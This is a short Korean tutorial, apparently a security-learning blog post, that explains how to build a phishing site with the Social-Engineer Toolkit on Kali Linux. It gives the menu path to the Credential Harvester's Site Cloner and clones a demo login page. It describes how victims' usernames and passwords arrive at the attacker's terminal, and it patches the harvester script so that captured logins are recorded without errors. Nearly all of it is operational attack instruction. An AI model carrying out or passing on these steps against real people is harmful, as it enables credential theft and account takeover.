사회공학의 핵심은 대상에게 신뢰를 주어 자신이 공격당하는 것을 눈치 채지 못하게 만드는 것이다.
그 유형중의 하나가 피싱 사이트이다.
칼리리눅스는 기본적으로 setoolkit이 설치되어있다. 업데이트는 아래 명령으로 수행한다. # apt install setools
# setoolkit site cloner
setoolkit은 가짜 facebook, twitter, google 등.. 피싱 사이트를 제작할 수 있는 기능을 보유하고 있다.
setoolkit의 사용법은 아래와 같다.
# setoolkit
① Social-Engineering Attacks ② Website Attack Vectors ③ Credential Harvester Attack Method ④ Site Cloner IP address for the POST back in Harvester/Tabnabbing [ip_address]: - clone 될 ip 입력 - 본인 서버인 경우 기본 값은 localhost이므로 Enter Enter the url to clone: http://demo.testfire.net/login.jsp
이제 사용자가 내 피싱사이트(192.168.111.132)에 로그인 시도를하면 계정 정보를 터미널로 전달받는다.
Site cloner 대신에 이미 만들어진 웹 템플릿을 사용할 수도 있다.
아래 화면은 피해자가 가짜 google 사이트에 접속하여 로그인 시도후 공격자에게 계정을 탈취당한 내용이다.
만약 로그인 시도했을 때 다음 에러가 발생하면, usr/share/set/src/webattack/harvester/harvester.py를 수정해야 한다.
File "/usr/share/set/src/webattack/harvester/harvester.py", line 334, in do_POST filewrite.write(cgi.escape("PARAM: " + line + "\n")) AttributeError: module 'cgi' has no attribute 'escape'
harvester.py 파일을 열어서 import html을 추가해주고 저 오류난 구문을 찾아서 cgi.escape를 html.escape로 변경해준다. 아래 수정된 코드가 있으니 다운받아서 사용해도 된다.
